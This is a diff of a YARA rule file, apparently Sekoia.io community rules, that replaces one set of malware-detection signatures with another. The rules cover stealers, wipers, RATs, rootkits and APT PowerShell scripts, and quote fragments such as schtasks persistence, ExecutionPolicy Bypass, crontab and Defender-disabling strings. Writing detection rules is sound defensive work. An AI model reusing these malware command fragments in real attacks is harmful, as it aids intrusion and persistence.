+		$str08 = "FILENAME:" ascii
+		$str09 = "multipart/form-data; boundary=" ascii
+		$str10 = "src/browsers/firefox/modules/decryptors.rs" ascii
+		$str11 = "{\"event_id\":\"" ascii
+		$str12 = "..browsers..firefox..modules..data_stealers.." ascii
+		$str13 = "..browsers..chromium..modules..key_stealers.." ascii
+		$str14 = "..browsers..firefox..modules..decryptors.." ascii
+		$str15 = "url: , login: , password:" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and 13 of ( $str* )
 }
-rule SEKOIA_Crime_Sload_Scheduledtask_Dropper_Strings
+rule SEKOIA_Evilnumpayload_Fmtstr
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect payload of EvilNum"
 		author = "Sekoia.io"
-		id = "01c51da8-71a5-449f-a609-933c37bc2e63"
-		date = "2022-08-02"
+		id = "980c58e4-e04d-4076-a92e-2c04ced19ece"
+		date = "2022-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_scheduledtask_dropper_strings.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3a48009933d1de47314ec15c262375636574a7565016eab3792106fa2c0ba79f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/evilnumpayload_fmtstr.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7aa55d0677e58658bb76a2d7386a7434011b5f9b8c9de1b718c37f85907ddcc3"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$hh='hi'+'dd'+'en';"
-		$ = { 7D 65 6C 73 65 7B 0A 24 72 73 3D 30 3B 0A 7D 0A }
-		$ = { 6B 69 6C 6C 20 2D 6E 61 6D 65 20 2A 77 65 72 73 68 65 6C 2A }
+		$fmtstr01 = "{\"v\":\"" ascii wide
+		$fmtstr02 = ",\"u\":\"" ascii wide
+		$fmtstr03 = ",\"a\":\"" ascii wide
+		$fmtstr04 = ",\"w\":\"" ascii wide
+		$fmtstr05 = ",\"d\":\"" ascii wide
+		$fmtstr06 = ",\"n\":\"" ascii wide
+		$fmtstr07 = ",\"r\":\"1\"" ascii wide
+		$fmtstr08 = ",\"r\":\"0\"" ascii wide
+		$fmtstr09 = ",\"xn\":\"" ascii wide
+		$fmtstr10 = ",\"s\":0}" ascii wide
+		$fmtstr11 = "{\"u\":\"" ascii wide
+		$fmtstr12 = "\",\"sc\":1" ascii wide
+		$fmtstr13 = ",\"dt\":\"" ascii wide
 
 	condition:
-		all of them
+		8 of ( $fmtstr* )
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
+
+rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
 {
 	meta:
-		description = "Detects clean version of PowerShower"
+		description = "Detect the Purple Fox trojan"
 		author = "Sekoia.io"
-		id = "4a7c37df-3f53-4190-a86f-94bba3df628e"
-		date = "2022-12-05"
+		id = "798dc20b-76cd-4e31-b9ee-f363fb39cd58"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powershower_clean.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "24ea6ec0cd8dbcebdf7e42dbd48319562d8682fefd5d0d464a3a5c4b90be40f3"
+		reference = "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rootkit_win_purplefox_kernel_driver.yar#L3-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "91d7caca7c0c41e70813d52b5662bf0238d078fca519bfc2c03f3f87fe3805b8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230616,27 +231323,28 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[io.file]::WriteAllBytes($zipfile" ascii wide
-		$ = "System.IO.File]::Exists($p_t" ascii wide
-		$ = "HttpRequestP" ascii wide
-		$ = "$http_request.getOption(2)" ascii wide
-		$ = "HttpRequestP($url)" ascii wide
+		$ = "\\DosDevices\\Global\\MyDriver" wide
+		$ = "IOCTL_IO_KILL_PROCESS" ascii
+		$ = "IOCTL_IO_DELET_FILE" ascii
+		$ = "IOCTL_IO_COPY_FILE" ascii
+		$ = "IOCTL_IO_KILL_MINIFITER" ascii
 
 	condition:
-		uint8( 0 ) == 0x24 and filesize < 4000 and 4 of them
+		uint16( 0 ) == 0x5A4D and all of them or ( pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 158 , 30319 ) and pe.rich_signature.toolid ( 170 , 30319 ) and pe.rich_signature.toolid ( 147 , 30729 ) and pe.rich_signature.toolid ( 1 , 0 ) ) and for any i in ( 0 .. pe.number_of_signatures -1 ) : ( pe.signatures [ i ] . thumbprint == "c7939f8303ca22effb28246e970b13bee6cb8043" )
 }
-rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
+
+rule SEKOIA_Wiper_Win_Dnwipe : FILE
 {
 	meta:
-		description = "Detects XploitSPY DEX file"
+		description = "Detect the dnWipe malware"
 		author = "Sekoia.io"
-		id = "0aa86c2e-dba6-4ef4-a47e-f1b43e04f1f3"
-		date = "2022-08-24"
+		id = "522fdaa5-8fe6-4e37-aaf8-13e3a7787d21"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_xploitspy_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eabb1dbeaa8aefc33beb7fb158bbd8ad2c5b848d34c99473704da36a6dc461aa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_win_dnwipe.yar#L4-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "634ca80a168c9d98ce87a3a1a451769bddb7ae27e28b3682693b34ccce2c7ad4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230644,34 +231352,25 @@ rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 04 30 78 43 42 00 }
-		$ = { 04 30 78 43 4C 00 }
-		$ = { 04 30 78 43 4F 00 }
-		$ = { 04 30 78 46 49 00 }
-		$ = { 04 30 78 47 50 00 }
-		$ = { 04 30 78 49 4E 00 }
-		$ = { 04 30 78 4C 4F 00 }
-		$ = { 04 30 78 4D 49 00 }
-		$ = { 04 30 78 4E 4F 00 }
-		$ = { 04 30 78 50 4D 00 }
-		$ = { 04 30 78 53 4D 00 }
-		$ = { 04 30 78 57 49 00 }
+		$ = "dnWIPE"
+		$ = "dnWIPE" wide
+		$ = "C:\\Users\\Admin1\\source\\repos\\dnWIPE\\dnWIPE\\obj\\Debug\\dnWIPE.pdb"
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and filesize < 1MB and 10 of them
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 50KB or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "93290ef6447b0a16b92e50a1652ac3eb8f1237cc5f8005e080750fb58c19d230" )
 }
-rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
+rule SEKOIA_Apt_Sandworm_Orcshred_Apr2022 : FILE
 {
 	meta:
-		description = "Finds PennyWise samples based on strings"
+		description = "Detects the ORCSHRED script"
 		author = "Sekoia.io"
-		id = "9852b7e7-dfff-44e6-9068-d287cc84b069"
-		date = "2023-03-22"
+		id = "1a88800c-29e1-4e2c-8374-f5a93dd9fd91"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_pennywise_mar23.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "55d7d6894de23af38230eaaff0a38c31d11d3df34aacd21fd93393d266c9357c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_orcshred_apr2022.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "de38cf43fa5cc756c26ae241f2e60636c2aabbe4254fdeca2340c62873498de7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230679,33 +231378,26 @@ rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chr01 = "MvgmsudRT3loHygSj1F9K" ascii
-		$chr02 = "WebInfidelity2023" ascii
-		$chr03 = "PennyWise" ascii
-		$str01 = "get_Handle" ascii
-		$str02 = "get_Now" ascii
-		$str03 = "get_Ticks" ascii
-		$str04 = "set_Expect100Continue" ascii
-		$str05 = "get_Jpeg" ascii
-		$str06 = "set_UseShellExecute" ascii
-		$str07 = "get_ProcessName" ascii
-		$str08 = "get_UtcNow" ascii
+		$ = "find /etc -name os-release >"
+		$ = "/bin/bash /var/"
+		$ = "crontab -l >"
+		$ = ".sh & disown"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $chr* ) and 5 of ( $str* )
+		3 of them and filesize < 2KB
 }
-rule SEKOIA_Rat_Win_Asyncrat : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
 {
 	meta:
-		description = "Detect AsyncRAT based on specific strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "d698e4a1-77ff-4cd7-acb3-27fb16168ceb"
-		date = "2023-01-25"
+		id = "703d2eb2-c9fd-4891-ba95-f94a8313618e"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_asyncrat.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5e35b034ba1761fae780429be377b70ae8ce62273670042ff067c38ed8bb5a9e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_11.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "00c0dcc244db608d3a0d7500cdebadcc69ba0d56091a0a1fd7d58c27d255861f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230713,35 +231405,27 @@ rule SEKOIA_Rat_Win_Asyncrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "get_ActivatePong" ascii
-		$str02 = "get_SslClient" ascii
-		$str03 = "get_TcpClient" ascii
-		$str04 = "get_SendSync" ascii
-		$str05 = "get_IsConnected" ascii
-		$str06 = "set_UseShellExecute" ascii
-		$str07 = "Pastebin" wide
-		$str08 = "Select * from AntivirusProduct" wide
-		$str09 = "Stub.exe" wide
-		$str10 = "timeout 3 > NUL" wide
-		$str11 = "/c schtasks /create /f /sc onlogon /rl highest /tn " wide
-		$str12 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
+		$ = "decodeHex = EL.NodeTypedValue"
+		$ = "Private Function decodeHex(hex)"
+		$ = "serialized_obj = serialized_obj & "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of them
+		all of them and filesize < 2MB
 }
 
-rule SEKOIA_Wiper_Hermeticwiper_Variants
+rule SEKOIA_Typhon_Reborn_Stealer
 {
 	meta:
-		description = "Matches HermeticWiper and possible variants"
+		description = "Typhon Reborn v2 string based detection"
 		author = "Sekoia.io"
-		id = "102ecf15-167e-49e4-932c-6334e3cdcc69"
-		date = "2022-02-24"
+		id = "aab7279b-b651-4092-b988-d186d0a433de"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_hermeticwiper_variants.yar#L3-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d0c358517b0a6334d430d3bd75d6c58243ce84e0f90afe48a5069a1e1954119c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/typhon_reborn_stealer.yar#L3-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0db77a2e1d6b7274b0256fe469b72953c1b8598cbfc1715a43e5fbfa7899fe4c"
 		score = 75
 		quality = 80
 		tags = ""
@@ -230749,73 +231433,54 @@ rule SEKOIA_Wiper_Hermeticwiper_Variants
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SeLoadDriverPrivilege" wide
-		$ = "\\\\.\\PhysicalDrive" wide
-		$ = "::$INDEX_ALLOCATION" wide
-		$ = "CrashDumpEnabled" wide
+		$s1 = "api.telegram.org/bot" wide
+		$s2 = "TyphonReborn Stealer v2 log!" wide
 
 	condition:
-		2 of them and pe.characteristics and pe.number_of_signatures == 1 and pe.number_of_resources > 2 and for 2 i in ( 0 .. pe.number_of_resources - 1 ) : ( uint32be( pe.resources [ i ] . offset + 15 ) == 0x4D5A9000 and uint16be( pe.resources [ i ] . offset ) == 0x535A )
+		all of them and pe.is_pe
 }
-rule SEKOIA_Backdoor_Win_Spacecolon : FILE
+
+rule SEKOIA_Apt_Win_Disabledefender
 {
 	meta:
-		description = "Finds Spacecolon samples based on specific strings (ScHackTool component)"
+		description = "detects strings and imphash"
 		author = "Sekoia.io"
-		id = "ae09f0e2-e913-44d5-abe1-715170368cc8"
-		date = "2023-08-25"
+		id = "a7b124ab-4c9d-47c0-a59e-211cc713b9b3"
+		date = "2022-09-23"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_spacecolon.yar#L1-L39"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1251df19c521e9ee9da307d56eea265265f2bee4a8e7eec099e4ebfb4e2bd7a2"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_win_disabledefender.yar#L3-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3b8c8d9144d9f97ee053c7cefc30d3920940bc33efcd1d7f5c61666217ef7896"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Before Work" ascii
-		$str02 = "DEFENDER OFF" ascii
-		$str03 = "Stop Service" ascii
-		$str04 = "Kill All (Default)" ascii
-		$str05 = "Keyboard EN" ascii
-		$str06 = "After Work" ascii
-		$str07 = "Del Shadow Log" ascii
-		$str08 = "Kill OSK" ascii
-		$str09 = "PWGEN" ascii
-		$str10 = "Character :" ascii
-		$str11 = "PW GEN" ascii
-		$str12 = "Cobian UI Pass" ascii
-		$str13 = "Credssp" ascii
-		$str14 = "Username :" ascii
-		$str15 = "Password :" ascii
-		$str16 = "TSpeedButton" ascii
-		$str17 = "Ab1q2w3e!" ascii
-		$str18 = "PC Details" ascii
-		$str19 = "Mimi Dump" ascii
-		$str20 = "MIMI Dump" ascii
-		$str21 = "powershell -ExecutionPolicy Bypass -File \"" wide
-		$str22 = "lastlog.txt" wide
-		$str23 = "$AdminGroupName = (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = \"S-1-5-32-544\"').Name" wide
-		$str24 = "net localgroup $AdminGroupName " wide
+		$ = "Restarting with privileges"
+		$ = "Windows defender is currently ACTIVE"
+		$ = "Windows defender is currently OFF"
+		$ = "Disabled windows defender"
+		$ = "Failed to disable defender..."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 17 of them
+		4 of them or pe.imphash ( ) == "74a6ef9e7b49c71341e439022f643c8e"
 }
-rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
+
+rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
 {
 	meta:
-		description = "Detects RationalLove Local Privesc exploit"
+		description = "Invalid printer loader detection based on the XOR key"
 		author = "Sekoia.io"
-		id = "e71e026e-ca2c-42b7-b552-b3fd013676db"
-		date = "2023-12-08"
+		id = "6dd3046d-55fb-4bcc-8735-dbc0add4d570"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_rationallove_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "84a53a1d4f08e178a5cf1c968b3b98ae8624c3d052760517ec88bddd25833108"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/in2al5d_p3in4er_loader.yar#L3-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fb7dadcd1e87c15cacfc046e76648b1fa29f1bce44fa0314b84746ca57eebaed"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230823,25 +231488,23 @@ rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
-		$ = "Detected OS version: %s"
-		$ = "Content-Type: text/plain; charset=UTF-8"
+		$xor_key = "in2al5d p3in4er" ascii fullword
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		all of them and ( filesize > 4MB and filesize < 7MB ) and pe.is_pe
 }
-rule SEKOIA_Apt_Tealkurma_Snappytcp_Reverse_Shell_Strings : FILE
+rule SEKOIA_Tool_Gsocket_Strings : FILE
 {
 	meta:
-		description = "Detects TealKurma SnappyTCP reverse shell"
+		description = "Detects Gsocket based on strings"
 		author = "Sekoia.io"
-		id = "e842825c-546c-475a-bc94-7e97aea4e9e0"
-		date = "2023-12-08"
+		id = "55fb2f2b-1074-4b6d-9113-48eaeb0e1e27"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_tealkurma_snappytcp_reverse_shell_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "feb24cafcf5b080c91dab42bf8d78fbdb0b7fae9395c7513f02aa90a25663d2c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_gsocket_strings.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c54308293a9f64b571282eac9fba01e4671ba6b0cd45936fab92d4d9af904bbb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230849,27 +231512,28 @@ rule SEKOIA_Apt_Tealkurma_Snappytcp_Reverse_Shell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "2>&1>/dev/null&" ascii
-		$ = ".php HTTP/1.1" ascii
-		$ = "GET /" ascii
-		$ = "Hostname: %s" ascii
-		$ = "bash -c \"./" ascii
+		$ = "proxy. It allows multiple gs-netcat clients to (securely) relay"
+		$ = "GS-NETCAT(1)            General Commands Manual          GS-NETCAT(1)"
+		$ = "-T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN."
+		$ = "-D      Daemon & Watchdog mode. Start gs-netcat as a background process"
+		$ = "gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]"
+		$ = "The gs-netcat utility is a re-implementation of netcat."
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 3MB and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcafebabe ) and filesize > 2MB and filesize < 6MB and 2 of them
 }
-rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
+rule SEKOIA_Platypus_Winlinmac_Strings : FILE
 {
 	meta:
-		description = "Detects XMRig EXE"
+		description = "Catch Platypus based on strings"
 		author = "Sekoia.io"
-		id = "35f203aa-20cd-4235-9ead-b34be14255d5"
-		date = "2024-01-04"
+		id = "4519448d-b91b-4794-9521-359b8cf4af78"
+		date = "2023-12-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/miner_win_xmrig_strings.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "34aa0da9d3bb277927c87a3745ec9e35881682319c91141da6ff1cff7e0610d9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/platypus_winlinmac_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3c8e928fb8328381997230d4b60de20d07a9a3aee006aad9fc0b67fcfe61a63b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230877,41 +231541,30 @@ rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "XMRig "
-		$ = "pool_wallet"
-		$ = "IP Address currently banned"
-		$ = "rigid"
-		$ = "diff_current"
-		$ = "shares_good"
-		$ = "shares_total"
-		$ = "avg_time"
-		$ = "avg_time_ms"
-		$ = "hashes_total"
-		$ = "pool address"
-		$ = "ping time"
-		$ = "connection time"
-		$ = "daemon+wss://"
-		$ = "daemon+https://"
-		$ = "daemon+http://"
-		$ = "socks5://"
-		$ = "stratum+ssl://"
-		$ = "stratum+tcp://"
+		$pl1 = "platypus.go" ascii
+		$pl2 = "Platypus/lib/context/server.go" ascii
+		$pl3 = "Platypus/lib/context/context.go" ascii
+		$pl4 = "Platypus/lib/context/client.go" ascii
+		$pl5 = "github.com/WangYihang/" ascii
+		$f1 = "reflection/reflection.go" ascii
+		$f2 = "socksUsernamePassword" ascii
+		$go = "/golang" ascii
 
 	condition:
-		uint32be( 0 ) == 0x5A4D and filesize < 15MB and 7 of them
+		uint32( 0 ) == 0x464c457f and 4 of ( $pl* ) and 1 of ( $f* ) and #go > 30
 }
-rule SEKOIA_Tool_Rsockstun_Strings : FILE
+rule SEKOIA_Apt_Oilrig_Powerexchange : FILE
 {
 	meta:
-		description = "Detects Rsockstun based on strings"
+		description = "Detects OilRig's PowerExchange backdoor"
 		author = "Sekoia.io"
-		id = "94d8cb39-3421-441c-8404-62a591b86912"
-		date = "2023-12-22"
+		id = "cb6b370f-7b05-480b-865e-ac81ded4a2a4"
+		date = "2023-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_rsockstun_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8faf1004ec56728f1e451734ed651e8f77a49faf7f232df82e0b4950a9f1d198"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_powerexchange.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5e505e9bbb17500f7e9a316b66bccb62089172582478230e0bda736bbefa1fd6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230919,87 +231572,95 @@ rule SEKOIA_Tool_Rsockstun_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "main.connectviaproxy"
-		$ = "main.connectForSocks"
-		$ = "main.listenForClients"
-		$ = "main.listenForSocks"
+		$ = "($h.value).PadRight((($h.value).Length+($h.value).Length%4),'='" ascii wide
+		$ = "(($h.value).Length%4 -ne 0)" ascii wide
+		$ = "-match \"@@(.*)@@\"" ascii wide
+		$ = "[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath" ascii wide
+		$ = "ContainsSubjectStrings.Add(\"@@\")" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and all of them
+		2 of them and filesize < 50KB
 }
-rule SEKOIA_Apt_Sandworm_Powergap_Apr2022 : FILE
+rule SEKOIA_Apt_Kimsuky_Powershell : FILE
 {
 	meta:
-		description = "Detects the POWERGAP malware"
+		description = "Powershell scripts used by Kimsuky. If size < 3KB ok. If between 3 and 15, a check is needed"
 		author = "Sekoia.io"
-		id = "2a1c7f02-92b3-45b8-a710-253b1a28fe85"
-		date = "2022-04-12"
+		id = "b7f812e0-d08b-40fe-908a-dc5765d6bc66"
+		date = "2024-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_powergap_apr2022.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f1532cce42ab1315d3ab7882fa43ad05255055da720a123bed034242d439da2a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_powershell.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "6babb53d881448dc58dd7c32fcd4208a"
+		hash = "29ec7a4495ea512d44d33c9847893200"
+		hash = "fde68771cebd7ecd81721b0dff5b7869"
+		hash = "0c3fd7f45688d5ddb9f0107877ce2fbd"
+		hash = "1a1723be720c1d9cd57cf4a6a112df79"
+		logic_hash = "7436d8cba8a8caaf95786c38c4ceee4426dc7e36ae3eeed5d3162310cd76091d"
 		score = 75
-		quality = 68
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Get-WmiObject Win32 ComputerSystem).Domain" nocase wide ascii
-		$ = "Write-Host \"Error1" nocase wide ascii
-		$ = "Write-Host \"Done\" -ForegroundColor Red" nocase wide ascii
